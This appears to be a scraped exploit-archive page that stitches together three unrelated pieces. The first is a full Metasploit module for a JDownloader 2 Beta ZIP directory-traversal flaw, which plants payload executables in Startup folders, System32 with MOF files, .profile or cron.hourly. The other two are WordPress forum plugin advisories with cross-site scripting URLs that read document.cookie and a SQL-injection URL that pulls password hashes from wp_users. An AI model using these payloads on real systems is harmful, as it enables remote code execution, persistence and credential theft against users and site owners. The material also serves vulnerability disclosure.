2015-06-01 : JDownloader 2 Beta Update : Looks not vulnerable anymore
2015-06-04 : Disclosure of this document

7. Solution
Update JDownloader 2 Beta to the latest version.

8. Personal Notes

I am NOT a security professional, just a kiddy fan of security.
I was boring so I looked for some security flaws in some software and happily found this.
If you have any questions/remarks, don't hesitate to contact me by email.
I'm interesting in any discussion/advice/exchange/question/criticism about security/exploits/programming :-)
=end
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec

  def initialize( info = {} )

    super( update_info( info,
      'Name'          => 'JDownloader 2 Beta Directory Traversal Vulnerability',
      'Description'   => %q{
        This module exploits a directory traversal flaw in JDownloader 2 Beta 
        when extracting a ZIP file (which by default is automatically done by JDL).
        
        The following targets are available :
        Windows regular user : Create executable file in the 'Start Menu\Startup'
        under the user profile directory. (Executed at next session startup).
        Linux regular user : Create an executable file and a .profile script calling
        it in the user's home directory. (Executed at next session login).
        Windows Administrator : Create an executable file in C:\\Windows\\System32
        and a .mof file calling it. (Executed instantly).
        Linux Administrator : Create an executable file in /etc/crontab.hourly/.
        (Executed within the next hour).
		
		Vulnerability date : Apr 27 2012 (SVN Revision > 1170)
      },
      'License'       => MSF_LICENSE,
      'Author'        => [ 'PizzaHatHacker <PizzaHatHacker[A]gmail[.]com>' ], # Vulnerability Discovery & Metasploit module
      'References'    =>
      [
        [ 'URL', 'http://jdownloader.org/download/offline' ],
      ],
      'Platform'      => %w{ linux osx solaris win },
      'Payload'       => {
        'Space' => 20480, # Arbitrary big number
        'BadChars' => '',
        'DisableNops' => true
    },
      'Targets'       =>
        [
          [ 'Windows Regular User (Start Menu Startup)',
            {
              'Platform'     => 'win',
              'Depth'        => 0, # Go up to root (C:\Users\Joe\Downloads\..\..\..\ -> C:\)
              'RelativePath' => 'Users/All Users/Microsoft/Windows/Start Menu/Programs/Startup/',
              'Option'       => nil,
            }
          ],
          [ 'Linux Regular User (.profile)',
            {
              'Platform'     => 'linux',
              'Depth'        => -2, # Go up 2 levels (/home/joe/Downloads/XXX/xxx.zip -> /home/joe/)
              'RelativePath' => '',
              'Option'       => 'profile',
            }
          ],
          [ 'Windows Administrator User (Wbem Exec)',
            {
              'Platform'     => 'win',
              'Depth'        => 0, # Go up to root (n levels)
              'RelativePath' => 'Windows/System32/',
              'Option'       => 'mof',
            }
          ],
          [ 'Linux Administrator User (crontab)',
            {
              'Platform'  => 'linux',
              'Depth'        => 0, # Go up to root (n levels)
              'RelativePath' => 'etc/cron.hourly/',
              'Option'       => nil,
            }
          ],
        ],
      'DefaultTarget'  => nil,
      'DisclosureDate' => ''
      ))
    
    register_options(
      [
        OptString.new('FILENAME', [ true, 'The output file name.', '']),
        
         # C:\Users\Bob\Downloads\XXX\xxx.zip  => 4
         # /home/Bob/Downloads/XXX/xxx.zip     => 4
         OptInt.new('DEPTH', [true, 'JDownloader download directory depth. (0 = filesystem root, 1 = one subfolder under root etc.)', 4]),
      ], self.class)
  
 register_advanced_options(
   [
     OptString.new('INCLUDEDIR', [ false, 'Path to an optional directory to include into the archive.', '']),
   ], self.class)
  end
  
  # Traversal path
  def traversal(depth)
    result = '.. /'
    if depth < 0
      # Go up n levels
      result = result * -depth
    else
      # Go up until n-th level
      result = result * (datastore['DEPTH'] - depth)
    end
    return result
  end
  
  def exploit
    # Create a new archive
    zip = Rex::Zip::Archive.new
  
    # Optionally include an initial directory
    dir = datastore['INCLUDEDIR']
    if not dir.nil? and not dir.empty?
      print_status("Filling archive recursively from path #{dir}")
      zip.add_r(dir)
    end
  
    # Create the payload executable file path
    exe_name = rand_text_alpha(rand(6) + 1) + (target['Platform'] == 'win' ? '.exe' : '')
    exe_file = traversal(target['Depth']) + target['RelativePath'] + exe_name

    # Generate the payload executable file content
    exe_content = generate_payload_exe()

    # Add the payload executable file into the archive
    zip_add_file(zip, exe_file, exe_content)
  
    # Check all available targets
    case target['Option']
    when 'mof'
      # Create MOF file data
        mof_name = rand_text_alpha(rand(6) + 1) + '.mof'
        mof_file = traversal(0) + 'Windows\\System32\\Wbem\\Mof\\' + mof_name
        mof_content = generate_mof(mof_name, exe_name)
        zip_add_file(zip, mof_file, mof_content)
    when 'profile'
      # Create .profile file
      bashrc_name = '.profile'
      bashrc_file = traversal(target['Depth']) + bashrc_name
      bashrc_content = "chmod a+x ./#{exe_name}\n./#{exe_name}"
      zip_add_file(zip, bashrc_file, bashrc_content)
    end
    
    # Write the final ZIP archive to a file
    zip_data = zip.pack
    file_create(zip_data)
  end
  
  # Add a file to the target zip and output a notification
  def zip_add_file(zip, filename, content)
    print_status("Adding '#{filename}' (#{content.length} bytes)");
    zip.add_file(filename, content, nil, nil, nil)
  end
end
HireHackking 
source: https://www.securityfocus.com/bid/53530/info

WP Forum Server plugin for WordPress is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

WP Forum Server 1.7.3 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&amp;vasthtml_action=structure&amp;do=addforum&amp;groupid=%27%3E%3Cscript%3Ealert%281%29%3C/script%3E

http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&amp;vasthtml_action=structure&amp;do=editgroup&amp;groupid='&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;

http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&amp;vasthtml_action=structure&amp;do=editgroup&amp;groupid=2 AND 1=0 UNION SELECT user_pass FROM wp_users WHERE ID=1

http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&amp;vasthtml_action=usergroups&amp;do=edit_usergroup&amp;usergroup_id='&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;
HireHackking 
source: https://www.securityfocus.com/bid/53529/info

The Mingle Forum plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Mingle Forum 1.0.33 is vulnerable; other versions may also be affected.

http://www.example.com/wp-admin/admin.php?page=mfstructure&amp;mingleforum_action=structure&amp;do=addforum&amp;groupid=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

http://www.example.com/wp-admin/admin.php?page=mfgroups&amp;mingleforum_action=usergroups&amp;do=edit_usergroup&amp;usergroup_id=1%27%3%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E